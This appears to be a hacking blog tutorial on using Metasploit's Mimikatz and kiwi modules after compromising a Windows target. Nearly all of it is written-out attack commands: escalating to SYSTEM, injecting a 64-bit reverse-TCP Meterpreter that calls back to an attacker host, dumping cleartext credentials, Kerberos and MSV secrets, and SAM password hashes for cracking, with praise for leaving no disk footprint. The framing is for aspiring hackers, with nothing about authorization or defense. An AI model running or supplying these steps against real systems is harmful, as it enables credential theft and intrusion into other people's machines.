Metasploit is such a powerful tool that I can only scratch the surface of its capabilities here. As it has developed over the years, it is now possible to use Metasploit for nearly everything from recon to post exploitation to covering your tracks. Given its versatility, every aspiring hacker should have at least a tentative grasp of Metasploit.
Every so often, a post-exploitation module comes out that is so powerful that every Metasploit user should be aware of it and learn to use it. Mimikatz is one such module. It was created by Benjamin Delpy, aka gentilkiwi, who developed it to teach himself C and to explore Windows security. Basically, it is capable of extracting various sets of Windows credentials from memory. It played a key role in the Iranian hack of the Sands Corporation in 2014.
Mimikatz was originally developed as standalone module that we can upload to the target or run locally on the target, but recently, Rapid7 has ported it for Metasploit and made it available as Meterpreter script. The advantage of this is that it will run entirely in memory and will not leave a footprint on the hard drive that might be detected.
One other key point before we begin: there are both 32- and 64-bit versions of Mimikatz. Often, Mimikatz will load the 32-bit version if we have used a 32-bit process to compromise the system. If that happens, Mimikatz will be largely non-functional. To avoid this potential problem, use the “migrate” command to migrate the Meterpeter to a 64-bit process before loading Mimkatz. In that way, it will load the 64-bit version and you will enjoy all of its amazing capabilities.
Step 1: Exploit the Target & Get a Meterpreter Payload
Mimikatz is a post-exploitation module, meaning that it can only be used after the target has been exploited. As a result, I will begin this module assuming that you have successfully exploited the target and have the Meterpreter payload installed on the target system. In addition, you will need to have sysadmin privileges on the target for Mimikatz to work. If you exploited the target as a regular user, you can use the getsystem Meterpreter command to escalate privileges to that of the system adminstrator.
meterpreter > getsystem
meterpreter > load kiwi
Note the warning that we have loaded the x86 Kiwi on an x64 architecture. We need to load a 64-bit payload to get the full capabilities of kiwi on this target system. Let’s load a 64-bit meterpreter on this Windows 7 64-bit architecture.
First, we need to background the meterpreter, so we can once again access the msf5 prompt.
meterpreter > background
Next, we need to load the payload_inject module
msf5 > use windows/local/payload_inject
Then, set the payload we want to inject.
msf5 > set payload window/x64/meterpreter/reverse_tcp
Set the local host.
msf > set LHOST 192.168.1.103
And connect it to the backgrounded meterpreter session.
msf5 > set SESSION 11
Before we execute the payload injection module, let’s check that all the option are set.
msf5 > show options
If everything is set correctly, now we can “exploit”.
msf5 > exploit
Now with a 64-bit payload, we can effectively run kiwi on a 64-bit system.
Next, let’s try the help screen on kiwi.
meterpreter> kiwi help
The very first command we see id creds_all. This will grab all of the credentials in RAM and dispaly them to the screen.
As you can see above, the kiwi module of mimikatz displays all the credentials from this system in clear text!
Running mimikatz on a 32-bit system
To run mimikatz from a 32-bit payload, we can enter;
meterpreter > load mimkatz
Next, let’s get a help screen.
meterpreter > help mimikatz
As you can see, mimikatz has a number of native commands and a special mimikatz_command to run custom commands.
Before we advance, let’s check the version of Mimikatz.
meterpreter > mimikatz_command -f version
Metasploit has only ported version 1.0, although Mimikatz is in version 2.0 (watch for my coming tutorial using the standalone version 2.0 of Mimikatz).
Step 2: Native Commands
Let’s start by looking to see what we can do to the system with the native commands. If we want to retrieve the Kerberos credentials, we simply need to type:
meterpreter > kerberos
We can retrieve Windows MSV (the Windows password authentication package) credentials by simply typing:
meterpreter > msv
Step 3: Mimikatz__Command
Mimikatz also enables us to create custom commands. The commands take the following syntax. Please note the double colon (::) between the command type and the command action.
mimikatz_command -f <type of command>::<command action>
If we want to retrieve password hashes from the SAM file, we can type:
meterpreter > mimikatz_command -f samdump::hashes
Of course, with these hashes, we can then crack them with any of a number of password cracking tools such Cain and Abel, Hashcat, John the Ripper, and others.
If we want to get a list of services running on the target system, we can use the command type service combined with the command action list.
meterpreter > mimikatz_command -f service::list
Step 4: Crypto
Mimikatz has a special command type that addresses cryptography and, as a you might expect, it is called crypto. Using this custom command, we can get a list of cryptography providers on the target system.
meterpreter > mimikatz_command -f crypto::listProviders
If we want to know where the various cryptography stores are located, we can type:
meterpreter > mimikatz_command -f crypto::listStores
Mimikatz is just another powerful tool for the penetester/hacker. Before attempting to use Mimkatz, make certain that you are fairly proficient in the use of Metasploit by going through my Metasploit series here.